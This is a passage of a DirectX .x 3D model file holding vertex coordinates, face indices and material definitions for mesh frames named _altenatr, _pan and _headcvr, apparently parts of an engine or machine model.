-1.294615;0.141163;-1.479536;, -1.294623;0.141163;-1.572860;, -1.330515;0.097516;-1.572858;, -1.355795;0.033033;-1.479532;, -1.336698;0.086573;-1.479532;, -1.336707;0.086573;-1.572858;, -1.355804;0.033033;-1.572856;, -1.357946;-0.036388;-1.479532;, -1.357946;0.020588;-1.479532;, -1.357955;0.020588;-1.572855;, -1.357955;-0.036388;-1.572855;, -1.336698;-0.102372;-1.479532;, -1.355795;-0.048833;-1.479532;, -1.355804;-0.048833;-1.572856;, -1.336707;-0.102372;-1.572858;, -1.178383;0.178129;-1.497040;, -1.178391;0.178129;-1.555371;, -1.212759;0.171945;-1.555368;, -1.212753;0.171945;-1.497038;, -1.239867;0.161874;-1.497036;, -1.239873;0.161874;-1.555367;, -1.270097;0.144070;-1.555365;, -1.270090;0.144070;-1.497034;, -1.292195;0.125144;-1.497033;, -1.292200;0.125144;-1.555363;, -1.314633;0.097864;-1.555362;, -1.314627;0.097864;-1.497032;, -1.329054;0.072365;-1.497030;, -1.329061;0.072365;-1.555361;, -1.340997;0.038902;-1.555361;, -1.340991;0.038902;-1.497030;, -1.346000;0.009905;-1.497029;, -1.346007;0.009905;-1.555360;, -1.346007;-0.025706;-1.555360;, -1.346000;-0.025706;-1.497029;, -1.340991;-0.054702;-1.497030;, -1.340997;-0.054702;-1.555361;, -1.329061;-0.088165;-1.555361;, -1.329054;-0.088165;-1.497030;, -1.194650;0.207586;-1.583199;, -1.194652;0.207586;-1.589087;, -1.194652;0.207586;-1.592617;, -1.218430;0.207586;-1.592616;, -1.239339;0.207586;-1.592614;, -1.249495;0.207586;-1.589083;, -1.253558;0.207586;-1.583195;, -1.225993;0.207586;-1.583198;, -1.276420;-0.229932;-1.560824;, -1.248230;-0.226638;-1.577445;, -1.296173;-0.218295;-1.560822;, -1.307477;-0.191735;-1.577442;, -1.276400;-0.229932;-1.320085;, -1.248207;-0.226638;-1.303467;, -1.296153;-0.218295;-1.320084;, -1.307452;-0.191735;-1.303463;, -1.153341;0.217641;-1.577451;, -1.152248;0.223960;-1.572869;, -1.159531;0.218757;-1.572868;, -1.097259;0.214065;-1.572871;, -1.098353;0.207747;-1.577455;, -1.092159;0.206633;-1.572873;, -1.159509;0.218757;-1.308055;, -1.152224;0.223960;-1.308056;, -1.153317;0.217641;-1.303474;, -1.098329;0.207747;-1.303477;, -1.097236;0.214065;-1.308060;, -1.092137;0.206633;-1.308060;, -1.095477;0.187300;-1.308060;, -1.091124;0.177773;-1.303477;, -1.097731;0.177724;-1.300104;, -1.101669;0.188414;-1.303476;, -1.095500;0.187300;-1.572871;, -1.101694;0.188414;-1.577455;, -1.097925;0.177244;-1.581083;, -1.091148;0.177773;-1.577455;, -1.156657;0.198308;-1.303474;, -1.163942;0.189638;-1.300099;, -1.170133;0.191988;-1.303472;, -1.166008;0.192733;-1.345058;, -1.162850;0.199421;-1.308055;, -1.162871;0.199421;-1.572868;, -1.166028;0.192733;-1.575923;, -1.170158;0.191988;-1.577450;, -1.169523;0.195727;-1.578492;, -1.163965;0.189125;-1.581081;, -1.156681;0.198308;-1.577451;; 214; 4;213,206,204,210;, 4;204,205,209,210;, 4;163,140,141,164;, 3;188,72,189;, 4;165,142,139,166;, 4;167,144,145,168;, 4;169,146,143,170;, 4;171,148,149,172;, 4;173,150,147,174;, 4;175,152,153,176;, 4;177,154,151,178;, 4;179,156,157,180;, 4;181,158,155,182;, 4;183,160,161,184;, 4;185,162,159,186;, 4;202,128,127,198;, 4;198,127,135,196;, 4;197,198,196,195;, 4;196,135,136,200;, 4;200,136,128,202;, 4;199,200,202,201;, 4;213,214,208,206;, 4;210,211,212,213;, 3;210,209,211;, 4;211,209,227,223;, 4;211,223,218,212;, 4;214,212,218,215;, 3;213,212,214;, 4;216,215,218,217;, 4;217,218,223,224;, 3;223,225,224;, 3;225,223,227;, 5;81,74,224,225,80;, 4;74,68,217,224;, 4;75,69,68,74;, 4;82,75,74,81;, 4;90,82,81,89;, 4;89,81,80,88;, 4;97,89,88,96;, 4;98,90,89,97;, 18;138,7,15,23,31,39,47,55,63,69,75,82,90,98,106,114,122,130;, 4;69,63,62,68;, 5;68,62,61,216,217;, 4;62,54,53,61;, 4;63,55,54,62;, 4;55,47,46,54;, 4;54,46,45,53;, 4;46,38,37,45;, 4;47,39,38,46;, 4;39,31,30,38;, 4;38,30,29,37;, 4;30,22,21,29;, 4;31,23,22,30;, 4;23,15,14,22;, 4;22,14,13,21;, 4;14,6,5,13;, 4;6,137,136,5;, 4;7,138,137,6;, 4;15,7,6,14;, 4;138,130,129,137;, 4;137,129,128,136;, 4;129,121,120,128;, 4;130,122,121,129;, 4;122,114,113,121;, 4;121,113,112,120;, 4;113,105,104,112;, 4;114,106,105,113;, 4;106,98,97,105;, 4;105,97,96,104;, 4;206,207,203,204;, 3;204,203,205;, 4;205,203,233,228;, 4;207,220,233,203;, 4;207,208,219,220;, 3;207,206,208;, 4;220,221,232,233;, 3;231,233,232;, 5;231,232,73,188,187;, 3;188,73,72;, 4;73,67,66,72;, 4;232,221,67,73;, 5;222,60,59,67,221;, 4;67,59,58,66;, 4;59,51,50,58;, 4;60,52,51,59;, 4;52,44,43,51;, 4;51,43,42,50;, 4;50,42,41,49;, 4;58,50,49,57;, 4;66,58,57,65;, 4;72,66,65,71;, 4;78,72,71,77;, 4;85,78,77,84;, 4;93,85,84,92;, 4;94,86,85,93;, 4;95,87,86,94;, 4;103,95,94,102;, 4;102,94,93,101;, 4;101,93,92,100;, 4;109,101,100,108;, 4;110,102,101,109;, 4;111,103,102,110;, 4;119,111,110,118;, 4;118,110,109,117;, 4;117,109,108,116;, 4;125,117,116,124;, 4;126,118,117,125;, 4;127,119,118,126;, 4;135,127,126,134;, 4;134,126,125,133;, 4;3,134,133,2;, 4;11,3,2,10;, 4;19,11,10,18;, 4;20,12,11,19;, 4;12,4,3,11;, 4;4,135,134,3;, 4;2,133,132,1;, 4;10,2,1,9;, 4;18,10,9,17;, 4;26,18,17,25;, 4;27,19,18,26;, 4;28,20,19,27;, 4;36,28,27,35;, 4;35,27,26,34;, 4;34,26,25,33;, 4;42,34,33,41;, 4;43,35,34,42;, 4;44,36,35,43;, 4;220,219,222,221;, 3;229,228,233;, 4;189,72,78,190;, 4;190,78,85,191;, 4;191,85,86,192;, 4;192,86,87,193;, 4;133,125,124,132;, 5;194,79,230,231,187;, 4;193,87,79,194;, 4;145,79,87,146;, 4;144,80,79,145;, 4;142,79,80,139;, 5;229,230,79,142,141;, 3;229,233,230;, 3;230,233,231;, 4;228,229,226,227;, 4;140,226,229,141;, 5;139,80,225,226,140;, 4;166,139,140,163;, 4;170,143,144,167;, 4;143,88,80,144;, 4;146,87,88,143;, 4;148,88,87,149;, 4;149,87,95,150;, 4;172,149,150,173;, 4;168,145,146,169;, 4;164,141,142,165;, 4;205,228,227,209;, 3;225,227,226;, 4;147,96,88,148;, 4;174,147,148,171;, 4;214,215,219,208;, 4;222,219,215,216;, 4;216,61,60,222;, 4;61,53,52,60;, 4;53,45,44,52;, 4;45,37,36,44;, 4;37,29,28,36;, 4;29,21,20,28;, 4;21,13,12,20;, 4;13,5,4,12;, 4;5,136,135,4;, 4;188,192,194,187;, 5;192,188,189,190,191;, 3;194,192,193;, 4;128,120,119,127;, 4;162,119,120,159;, 4;161,111,119,162;, 4;160,112,111,161;, 4;158,111,112,155;, 4;157,103,111,158;, 4;156,104,103,157;, 4;154,103,104,151;, 4;153,95,103,154;, 4;152,96,95,153;, 4;150,95,96,147;, 4;151,104,96,152;, 4;178,151,152,175;, 4;182,155,156,179;, 4;155,112,104,156;, 4;159,120,112,160;, 4;186,159,160,183;, 4;184,161,162,185;, 4;180,157,158,181;, 4;176,153,154,177;, 4;71,65,64,70;, 4;77,71,70,76;, 4;84,77,76,83;, 4;92,84,83,91;, 4;100,92,91,99;, 4;108,100,99,107;, 4;116,108,107,115;, 4;124,116,115,123;, 4;132,124,123,131;, 4;1,132,131,0;, 4;9,1,0,8;, 4;17,9,8,16;, 4;25,17,16,24;, 4;33,25,24,32;, 4;41,33,32,40;, 4;49,41,40,48;, 4;57,49,48,56;, 4;65,57,56,64;, 4;195,196,200,199;, 4;201,197,195,199;, 4;201,202,198,197;; MeshMaterialList { 1; 214; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.784314;0.784314;0.784314;1.0;; 60.0; 0.784314;0.784314;0.784314;; 0.498039;0.498039;0.498039;; } # Material } # MeshMaterialList } # Mesh } # Frame _altenatr Frame _pan { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh pan { 75; -0.835725;-0.647656;-0.770733;, -0.152444;-0.647656;-0.770780;, -0.152359;-0.647656;0.159443;, -0.835640;-0.647656;0.159491;, -0.152492;-0.647656;-1.282316;, -0.194568;-0.647656;-1.315877;, -0.152492;-0.969212;-1.282316;, -0.194568;-0.969212;-1.315877;, -0.194564;-1.005774;-1.282312;, -0.793704;-0.969212;-1.315835;, -0.835774;-0.969212;-1.282268;, -0.793701;-1.005774;-1.282272;, -0.793704;-0.647656;-1.315835;, -0.835774;-0.647656;-1.282268;, -0.194521;-1.005774;-0.804341;, -0.192670;-1.040731;-0.770777;, -0.152442;-0.999441;-0.737215;, -0.152444;-0.969212;-0.770780;, -0.152442;-1.074094;-0.737215;, -0.192670;-1.075700;-0.770777;, -0.194514;-1.110656;-0.737212;, -0.793650;-1.110656;-0.737170;, -0.835725;-1.075700;-0.770733;, -0.793656;-1.005774;-0.804300;, -0.835725;-0.969212;-0.770733;, -0.835723;-0.999535;-0.737660;, -0.835725;-1.040731;-0.770733;, -0.793571;-1.110656;0.125921;, -0.835644;-1.074094;0.125925;, -0.793569;-1.074094;0.159487;, -0.152362;-1.074094;0.125878;, -0.194437;-1.110656;0.125882;, -0.194433;-1.074094;0.159445;, -0.194433;-0.866834;0.159445;, -0.194429;-0.823254;0.192387;, -0.152359;-0.793017;0.159443;, -0.152362;-0.836604;0.125878;, -0.152318;-0.694689;0.445033;, -0.194392;-0.721961;0.434678;, -0.178123;-0.692516;0.467618;, -0.809792;-0.692516;0.467662;, -0.793529;-0.721961;0.434719;, -0.835599;-0.694689;0.445080;, -0.793569;-0.866834;0.159487;, -0.835644;-0.836604;0.125925;, -0.835640;-0.793017;0.159491;, -0.793565;-0.823254;0.192427;, -0.835602;-0.647656;0.434098;, -0.793524;-0.647656;0.467659;, -0.194389;-0.647656;0.467619;, -0.152319;-0.647656;0.434052;, -0.859816;-0.647656;-1.290211;, -0.859768;-0.647656;-0.770731;, -0.859684;-0.647656;0.159491;, -0.859642;-0.647656;0.442045;, -0.803482;-0.647656;0.486841;, -0.184427;-0.647656;0.486797;, -0.128275;-0.647656;0.441995;, -0.128318;-0.647656;0.159441;, -0.128403;-0.647656;-0.770781;, -0.128451;-0.647656;-1.290261;, -0.184611;-0.647656;-1.335057;, -0.803664;-0.647656;-1.335015;, -0.128451;-0.619659;-1.290261;, -0.184611;-0.619659;-1.335057;, -0.803664;-0.619659;-1.335015;, -0.859816;-0.619659;-1.290211;, -0.859768;-0.619659;-0.770731;, -0.859684;-0.619659;0.159491;, -0.859642;-0.619659;0.442045;, -0.803482;-0.619659;0.486841;, -0.184427;-0.619659;0.486797;, -0.128275;-0.619659;0.441995;, -0.128318;-0.619659;0.159441;, -0.128403;-0.619659;-0.770781;; 73; 4;8,14,23,11;, 4;14,15,26,23;, 3;24,23,26;, 4;21,20,31,27;, 4;48,47,42,40;, 4;49,48,40,39;, 4;39,37,50,49;, 6;67,74,63,64,65,66;, 4;68,73,74,67;, 6;73,68,69,70,71,72;, 4;63,60,61,64;, 4;64,61,62,65;, 4;65,62,51,66;, 4;60,4,5,61;, 4;61,5,12,62;, 4;62,12,13,51;, 4;51,13,0,52;, 4;52,0,3,53;, 4;53,3,47,54;, 4;54,47,48,55;, 4;55,48,49,56;, 4;56,49,50,57;, 4;57,50,2,58;, 4;58,2,1,59;, 4;59,1,4,60;, 4;66,51,52,67;, 4;67,52,53,68;, 4;68,53,54,69;, 4;10,24,0,13;, 6;3,0,24,25,44,45;, 5;28,44,25,26,22;, 3;24,26,25;, 4;47,3,45,42;, 3;10,9,11;, 4;13,12,9,10;, 4;10,11,23,24;, 4;22,26,15,19;, 4;21,22,19,20;, 3;19,18,20;, 4;18,19,15,16;, 4;20,18,30,31;, 3;31,30,32;, 4;32,30,36,33;, 4;34,33,36,35;, 4;37,38,34,35;, 4;41,46,34,38;, 4;41,42,45,46;, 4;44,43,46,45;, 4;28,29,43,44;, 3;28,27,29;, 4;31,32,29,27;, 4;32,33,43,29;, 4;46,43,33,34;, 4;27,28,22,21;, 4;40,41,38,39;, 3;38,37,39;, 3;41,40,42;, 4;6,7,5,4;, 3;7,6,8;, 4;11,9,7,8;, 4;7,9,12,5;, 4;17,14,8,6;, 4;17,6,4,1;, 6;16,17,1,2,35,36;, 4;15,14,17,16;, 4;18,16,36,30;, 4;37,35,2,50;, 4;74,59,60,63;, 4;73,58,59,74;, 4;72,57,58,73;, 4;71,56,57,72;, 4;70,55,56,71;, 4;69,54,55,70;; MeshMaterialList { 1; 73; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.000000;0.000000;0.247059;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _pan Frame _headcvr { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh headcvr { 378; -1.487190;0.609918;0.448044;, -1.248920;0.665401;0.448623;, -1.250969;0.664932;-0.827613;, -1.489237;0.609449;-0.828191;, -1.249260;0.665323;0.235916;, -1.249602;0.665245;0.023210;, -1.249944;0.665167;-0.189495;, -1.250285;0.665089;-0.402201;, -1.250627;0.665010;-0.614908;, -1.487532;0.609840;0.235338;, -1.487873;0.609761;0.022632;, -1.488213;0.609683;-0.190074;, -1.488554;0.609605;-0.402780;, -1.488897;0.609527;-0.615485;, -1.295358;0.654586;0.448509;, -1.295699;0.654508;0.235804;, -1.296040;0.654430;0.023098;, -1.296382;0.654352;-0.189609;, -1.296723;0.654274;-0.402314;, -1.297064;0.654195;-0.615020;, -1.441094;0.620652;0.235451;, -1.440750;0.620731;0.448157;, -1.441775;0.620496;-0.189962;, -1.441434;0.620574;0.022744;, -1.442457;0.620340;-0.615373;, -1.442117;0.620418;-0.402667;, -1.497893;0.646633;-0.828191;, -1.506340;0.656194;-0.837804;, -1.508904;0.655596;-0.615507;, -1.491263;0.659704;-0.602551;, -1.497552;0.646711;-0.615485;, -1.490963;0.659773;-0.415670;, -1.508562;0.655675;-0.402801;, -1.497211;0.646790;-0.402779;, -1.508220;0.655753;-0.190095;, -1.490580;0.659860;-0.177140;, -1.496868;0.646868;-0.190074;, -1.490280;0.659929;0.009741;, -1.507879;0.655831;0.022611;, -1.496528;0.646946;0.022633;, -1.507538;0.655909;0.235316;, -1.489897;0.660017;0.248272;, -1.496186;0.647024;0.235338;, -1.489597;0.660085;0.435153;, -1.507216;0.655982;0.435110;, -1.495844;0.647102;0.448044;, -1.629417;0.581678;0.447318;, -1.631992;0.592607;0.434406;, -1.637758;0.579735;0.434375;, -1.641156;0.578954;-1.086405;, -1.635431;0.591816;-1.103813;, -1.662247;0.574053;-1.109078;, -1.103180;0.704250;-1.084326;, -1.081034;0.709397;-1.107690;, -1.114074;0.713241;-1.102040;, -1.099777;0.705032;0.436453;, -1.110632;0.714033;0.436421;, -1.108055;0.703103;0.449333;, -1.251332;0.715567;0.435731;, -1.268948;0.711465;0.435689;, -1.257573;0.702585;0.448623;, -1.269248;0.711397;0.248808;, -1.251653;0.715493;0.235938;, -1.257914;0.702507;0.235916;, -1.251995;0.715415;0.023232;, -1.269629;0.711309;0.010277;, -1.258255;0.702428;0.023211;, -1.269931;0.711240;-0.176604;, -1.252335;0.715337;-0.189473;, -1.258598;0.702351;-0.189495;, -1.252677;0.715259;-0.402180;, -1.270314;0.711152;-0.415134;, -1.258938;0.702272;-0.402200;, -1.270613;0.711084;-0.602015;, -1.253018;0.715181;-0.614886;, -1.259280;0.702194;-0.614907;, -1.256291;0.714421;-0.837198;, -1.259620;0.702116;-0.827613;, -1.693623;0.566747;-1.166460;, -1.692885;0.578448;-1.181065;, -1.699159;0.565458;-1.189470;, -1.699340;0.565417;-1.300953;, -1.693076;0.578404;-1.300932;, -1.690545;0.567465;-1.313844;, -1.055895;0.726777;-1.299385;, -1.044358;0.717934;-1.183617;, -1.055695;0.726822;-1.174716;, -1.049812;0.716661;-1.160580;, -1.299133;0.704441;-0.415204;, -1.305373;0.691459;-0.402314;, -1.299433;0.704372;-0.602086;, -1.305714;0.691381;-0.615020;, -1.298451;0.704597;0.010207;, -1.304690;0.691616;0.023097;, -1.298751;0.704529;-0.176675;, -1.305031;0.691538;-0.189609;, -1.297769;0.704754;0.435620;, -1.304007;0.691772;0.448509;, -1.298067;0.704685;0.248738;, -1.304350;0.691694;0.235805;, -1.461079;0.666727;0.248341;, -1.449746;0.657837;0.235451;, -1.460779;0.666795;0.435223;, -1.449404;0.657914;0.448156;, -1.461762;0.666571;-0.177071;, -1.450430;0.657680;-0.189961;, -1.461461;0.666639;0.009811;, -1.450087;0.657758;0.022744;, -1.462444;0.666414;-0.602482;, -1.451112;0.657523;-0.615372;, -1.462145;0.666483;-0.415600;, -1.450770;0.657602;-0.402667;, -1.639872;0.514045;0.434728;, -1.647091;0.512364;0.454952;, -1.631342;0.517411;0.447662;, -1.078739;0.646090;0.449003;, -1.062360;0.648523;0.456372;, -1.069644;0.646827;0.436112;, -1.647851;0.512196;-1.109079;, -1.642313;0.513486;-1.086071;, -1.684766;0.503602;-1.189471;, -1.679224;0.504891;-1.166463;, -1.676152;0.505607;-1.313844;, -1.684945;0.503561;-1.300953;, -1.072085;0.646268;-1.084686;, -1.066620;0.647541;-1.107668;, -1.035439;0.654803;-1.164891;, -1.029969;0.656076;-1.187902;, -1.049205;0.719456;-1.312287;, -1.045525;0.720902;-1.299366;, -1.030149;0.656035;-1.299366;, -1.033902;0.655162;-1.312286;, -1.002219;0.651003;-1.336152;, -0.918943;0.530351;-1.337281;, -1.707454;0.346779;-1.337939;, -1.738361;0.479587;-1.337940;, -0.999265;0.651680;0.504737;, -0.968358;0.518872;0.504736;, -1.704959;0.487353;0.503023;, -1.699074;0.501775;0.503100;, -1.674055;0.354545;0.503023;, -1.646108;0.512603;-1.101835;, -1.009788;0.656928;-1.336167;, -1.012730;0.656242;-1.340477;, -1.017690;0.658932;-1.321451;, -1.028062;0.657519;0.488639;, -1.007032;0.658572;0.504760;, -1.738034;0.479662;-1.134343;, -1.707484;0.486775;-1.069710;, -1.701279;0.499994;-1.069689;, -1.682923;0.504171;-1.101925;, -1.731817;0.492830;-1.134321;, -1.707128;0.346854;-1.134344;, -1.676579;0.353967;-1.069711;, -1.374056;0.424413;-1.337132;, -1.741275;0.533507;-1.338576;, -1.747542;0.520517;-1.338598;, -1.425091;0.605264;-1.339903;, -1.413814;0.596310;-1.339765;, -1.532171;0.588699;-1.339520;, -1.637564;0.564780;-1.339078;, -1.741377;0.533155;-1.392496;, -1.739216;0.517536;-1.405399;, -1.747643;0.520166;-1.392518;, -1.730978;0.480831;-1.404778;, -1.738463;0.479235;-1.391859;, -1.702393;0.357996;-1.404880;, -1.707559;0.346427;-1.391859;, -1.383979;0.432141;-1.404038;, -1.374159;0.424061;-1.391051;, -1.414729;0.564276;-1.406105;, -1.407191;0.565983;-1.393201;, -1.413909;0.595959;-1.393684;, -1.425191;0.604911;-1.393825;, -1.532270;0.588348;-1.393439;, -1.637667;0.564428;-1.392997;, -1.731021;0.480684;-1.424507;, -1.734556;0.503531;-1.338093;, -1.734185;0.488247;-1.337925;, -1.732080;0.492591;-1.325005;, -1.275651;0.596302;-1.339680;, -1.404541;0.555400;-1.339117;, -1.407109;0.566252;-1.352193;, -1.409328;0.576326;-1.339443;, -1.693625;0.359900;-1.424586;, -1.702420;0.357898;-1.418034;, -1.704981;0.368785;-1.424601;, -1.384007;0.432043;-1.417191;, -1.392830;0.429943;-1.423790;, 0.459167;0.570018;0.448069;, 0.221768;0.629068;0.448078;, 0.221740;0.629069;-0.828200;, 0.459138;0.570019;-0.828206;, 0.221764;0.629068;0.235364;, 0.221757;0.629069;0.022652;, 0.221754;0.629069;-0.190061;, 0.221749;0.629069;-0.402773;, 0.221743;0.629069;-0.615487;, 0.459165;0.570018;0.235356;, 0.459158;0.570018;0.022644;, 0.459154;0.570018;-0.190069;, 0.459148;0.570019;-0.402781;, 0.459144;0.570019;-0.615494;, 0.268035;0.617559;0.448076;, 0.268030;0.617559;0.235363;, 0.268024;0.617559;0.022650;, 0.268021;0.617560;-0.190062;, 0.268013;0.617560;-0.402775;, 0.268010;0.617560;-0.615487;, 0.412895;0.581526;0.235359;, 0.412899;0.581526;0.448071;, 0.412885;0.581527;-0.190067;, 0.412889;0.581526;0.022645;, 0.412877;0.581527;-0.615492;, 0.412879;0.581527;-0.402780;, 0.468357;0.607068;-0.828207;, 0.476930;0.616505;-0.837806;, 0.479845;0.615781;-0.615494;, 0.462293;0.620148;-0.602582;, 0.468360;0.607068;-0.615494;, 0.462295;0.620148;-0.415694;, 0.479848;0.615781;-0.402782;, 0.468365;0.607068;-0.402781;, 0.479856;0.615781;-0.190069;, 0.462301;0.620148;-0.177157;, 0.468369;0.607068;-0.190069;, 0.462306;0.620148;0.009731;, 0.479858;0.615781;0.022643;, 0.468374;0.607068;0.022644;, 0.479863;0.615781;0.235356;, 0.462312;0.620148;0.248270;, 0.468379;0.607067;0.235356;, 0.462315;0.620148;0.435157;, 0.479870;0.615780;0.435156;, 0.468386;0.607067;0.448069;, 0.600953;0.539648;0.447683;, 0.603671;0.550543;0.434771;, 0.609239;0.537586;0.434758;, 0.610157;0.537350;-1.086067;, 0.604600;0.550304;-1.103496;, 0.631134;0.532143;-1.108691;, 0.074146;0.670700;-1.085278;, 0.052042;0.676187;-1.108697;, 0.085146;0.679534;-1.102972;, 0.073221;0.670937;0.435547;, 0.084210;0.679774;0.435536;, 0.081491;0.668879;0.448448;, 0.224917;0.679196;0.435165;, 0.242471;0.674831;0.435164;, 0.230983;0.666118;0.448078;, 0.242465;0.674831;0.248276;, 0.224914;0.679196;0.235363;, 0.230978;0.666118;0.235364;, 0.224909;0.679196;0.022652;, 0.242463;0.674831;0.009739;, 0.230974;0.666118;0.022652;, 0.242455;0.674831;-0.177149;, 0.224904;0.679196;-0.190061;, 0.230968;0.666118;-0.190061;, 0.224899;0.679197;-0.402773;, 0.242452;0.674831;-0.415686;, 0.230964;0.666118;-0.402774;, 0.242446;0.674832;-0.602574;, 0.224894;0.679197;-0.615486;, 0.230958;0.666119;-0.615486;, 0.227795;0.678475;-0.837798;, 0.230955;0.666119;-0.828199;, 0.662302;0.524390;-1.166003;, 0.661717;0.536106;-1.180616;, 0.667783;0.523026;-1.188997;, 0.667780;0.523026;-1.300485;, 0.661716;0.536106;-1.300485;, 0.658998;0.525211;-1.313398;, 0.026859;0.694017;-1.300465;, 0.015376;0.685303;-1.184714;, 0.026860;0.694018;-1.175793;, 0.020843;0.683940;-1.161664;, 0.271163;0.667688;-0.415687;, 0.277226;0.654609;-0.402775;, 0.271161;0.667689;-0.602575;, 0.277224;0.654609;-0.615487;, 0.271173;0.667688;0.009738;, 0.277237;0.654609;0.022650;, 0.271171;0.667688;-0.177150;, 0.277233;0.654609;-0.190062;, 0.271183;0.667688;0.435163;, 0.277246;0.654609;0.448075;, 0.271180;0.667688;0.248275;, 0.277243;0.654609;0.235363;, 0.433598;0.627288;0.248271;, 0.422111;0.618576;0.235359;, 0.433600;0.627288;0.435158;, 0.422115;0.618575;0.448071;, 0.433587;0.627289;-0.177156;, 0.422099;0.618576;-0.190068;, 0.433593;0.627289;0.009732;, 0.422103;0.618576;0.022645;, 0.433578;0.627289;-0.602581;, 0.422090;0.618576;-0.615493;, 0.433582;0.627289;-0.415693;, 0.422093;0.618576;-0.402780;, 0.610359;0.471874;0.435153;, 0.617584;0.470076;0.455395;, 0.601906;0.475363;0.448066;, 0.051315;0.612314;0.448082;, 0.034985;0.614989;0.455413;, 0.042210;0.613193;0.435170;, 0.615803;0.470512;-1.108691;, 0.610324;0.471875;-1.085695;, 0.652452;0.461395;-1.188997;, 0.646969;0.462759;-1.166001;, 0.643670;0.463579;-1.313397;, 0.652450;0.461395;-1.300485;, 0.042176;0.613194;-1.085677;, 0.036691;0.614557;-1.108673;, 0.005531;0.622308;-1.165972;, 0.000041;0.623672;-1.188999;, 0.020034;0.686803;-1.313377;, 0.016397;0.688299;-1.300465;, 0.000040;0.623672;-1.300464;, 0.003761;0.622747;-1.313377;, -0.028020;0.619075;-1.337315;, -0.060930;0.486750;-1.337315;, 0.672525;0.304315;-1.337337;, 0.705439;0.436639;-1.337338;, -0.027977;0.619074;0.503634;, -0.060894;0.486749;0.503634;, 0.675144;0.444183;0.503612;, 0.669476;0.458689;0.503668;, 0.642231;0.311857;0.503613;, 0.614078;0.470940;-1.101451;, -0.020362;0.624886;-1.337315;, -0.017436;0.624158;-1.341619;, -0.012405;0.626765;-1.322581;, 0.000879;0.624487;0.487600;, -0.020106;0.625848;0.503671;, 0.705442;0.436639;-1.133736;, 0.675109;0.444184;-1.069172;, 0.669105;0.457493;-1.069172;, 0.650762;0.461958;-1.101452;, 0.699425;0.449899;-1.133735;, 0.672530;0.304314;-1.133735;, 0.642196;0.311858;-1.069172;, 0.340341;0.386939;-1.337326;, 0.709169;0.490507;-1.337997;, 0.715237;0.477426;-1.337998;, 0.394106;0.566998;-1.340082;, 0.382695;0.558215;-1.339963;, 0.500924;0.548829;-1.339446;, 0.605944;0.523333;-1.338751;, 0.709177;0.490174;-1.391918;, 0.706760;0.474596;-1.404819;, 0.715246;0.477093;-1.391919;, 0.697967;0.438020;-1.404195;, 0.705449;0.436306;-1.391259;, 0.667525;0.315631;-1.404296;, 0.672534;0.303981;-1.391258;, 0.350271;0.394543;-1.404217;, 0.340351;0.386607;-1.391247;, 0.383017;0.526198;-1.406286;, 0.375525;0.528012;-1.393400;, 0.382699;0.557883;-1.393884;, 0.394114;0.566666;-1.394002;, 0.500927;0.548498;-1.393367;, 0.605952;0.522999;-1.392672;, 0.697976;0.437880;-1.423925;, 0.701997;0.460635;-1.337514;, 0.701395;0.445360;-1.337338;, 0.699376;0.449730;-1.324424;, 0.244548;0.560279;-1.340192;, 0.372804;0.517450;-1.339313;, 0.375515;0.528266;-1.352391;, 0.377907;0.538302;-1.339640;, 0.658755;0.317674;-1.424023;, 0.667528;0.315538;-1.417450;, 0.670244;0.326388;-1.424017;, 0.350273;0.394450;-1.417371;, 0.359054;0.392221;-1.423949;; 382; 4;128,83,82,84;, 3;81,82,83;, 4;122,123,81,83;, 4;80,81,123,120;, 4;82,81,80,79;, 3;82,79,50;, 6;84,82,50,27,76,54;, 3;54,86,84;, 4;129,84,86,85;, 4;127,130,129,85;, 4;130,131,128,129;, 3;129,128,84;, 4;126,127,85,87;, 3;85,86,87;, 4;54,53,87,86;, 4;125,126,87,53;, 4;53,52,124,125;, 3;52,53,54;, 4;56,55,52,54;, 4;54,68,64,56;, 4;74,70,68,54;, 